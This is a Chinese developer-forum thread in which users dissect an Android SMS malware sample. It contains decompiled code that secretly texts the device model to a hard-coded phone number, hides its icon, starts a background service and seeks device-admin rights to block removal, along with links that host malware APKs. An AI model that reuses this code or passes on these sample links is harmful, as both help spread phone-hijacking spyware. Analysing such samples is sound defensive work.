手机病毒,之前看到有人会玩,刚好收到一个,你们拿去玩吧

2016-09-02 11:12:49 +08:00
 Olive
http://218.6.173.38:8990/

7360 次点击
所在节点    Android
21 条回复
luap
2016-09-02 12:34:35 +08:00
已返编译:

protected void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
super.requestWindowFeature(1);
setContentView(2130903040);
SmSutils localSmSutils = new SmSutils();
if (SmSutils.key.equals(SmSutils.getPublicKey(this)))
{
localSmSutils.sendSMS("18789837060", "手机已安装软件,回复 com#false 关闭 com#true 开启, 版本" + Build.VERSION.SDK_INT + " " + Build.MODEL, null);
Toast.makeText(this, "程序启动成功", 1).show();
getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
startService(new Intent(this, SmSserver.class));
this.Dmanager = ((DevicePolicyManager)getSystemService("device_policy"));
ComponentName localComponentName = new ComponentName(this, DeviceReceiver.class);
if (!this.Dmanager.isAdminActive(localComponentName))
{
Intent localIntent = new Intent(getAction());
localIntent.putExtra(getExtraDeviceAdmin(), localComponentName);
localIntent.putExtra(getExtraAddExplanation(), "设备管理器");
startActivityForResult(localIntent, 0);
}
finish();
return;
}
localSmSutils.sendSMS("18789837060", "证书错误,程序启动失败", null);
Toast.makeText(this, "证书错误,程序启动失败", 1).show();
finish();
}
iMono
2016-09-02 12:35:49 +08:00
@luap 好屌 大拇指
shimanooo
2016-09-02 12:46:21 +08:00
求玩法..

用小号发短信骂三门?
supman
2016-09-02 13:00:31 +08:00
@luap 求教 这个怎么反编译的。。竟然完完整整的出来了
ljbha007
2016-09-02 13:02:34 +08:00
@supman 因为没有混淆啊
ljbha007
2016-09-02 13:03:19 +08:00
炸之
Olive
2016-09-02 13:07:38 +08:00
@luap 厉害厉害(手动鼓掌
wohenyingyu01
2016-09-02 13:17:11 +08:00
是干嘛的……
jsonzz
2016-09-02 13:21:57 +08:00
我跟踪过类似的 Android 病毒,当时写了个分析。可以看看我 blog:http://ztwo.github.io/blog/Androidworm/
just1
2016-09-02 13:25:05 +08:00
不会玩放腾讯哈勃分析
ljcarsenal
2016-09-02 13:27:46 +08:00
@jsonzz 看了你那个文章,你是怎么进入他邮箱的呢 难道把密码写在 apk 里?
haozibi
2016-09-02 13:33:13 +08:00
@ljcarsenal 源码里有发信账号和密码。
hinkal
2016-09-02 13:33:40 +08:00
这病毒我见过,据说是个初二学生写的,密码就硬编码在代码里。
gimp
2016-09-02 13:46:12 +08:00
http://yzc178co.com/index.htm


@luap
@jsonzz

这个呢,我昨天反编译了一下,不太会 java ,也没看到什么有价值的东西,也不知道折腾的对不对

代码: https://mega.nz/#!CF93iCyS!93vk_KL3YKZMtWQ34GPb_1Jol-viW63FbCxHuIHOvaI

域名应该是快到期了, apk 这里: https://mega.nz/#!XJtACAZY!vPYDNgu7yIEbOeZZx98mTafLTJ3NgQM4izi0qJI9mrU
Rect
2016-09-02 13:54:18 +08:00
http://218.6.173.38/

...这个地址
CodingPuppy
2016-09-02 13:59:46 +08:00
android 漏洞不少,无法卸载的漏洞在 AndroidM 上还有
shenfu1991
2016-09-02 15:19:09 +08:00
关键是这个是 android 程序,在 iOS 无效吧。。。
VmuTargh
2016-09-02 16:33:21 +08:00
@shenfu1991 iOS 有支付宝(大雾
fjzjk
2016-09-02 18:06:40 +08:00
这种多了,实际上没啥,只是安卓权限比较多,安装上就能乱搞。
你看上面都有人反编译了,混淆都不做的
tempdban
2016-09-02 18:40:12 +08:00
@CodingPuppy 我有点蒙,只有成为设备管理器白不能卸载吧

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/303415

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX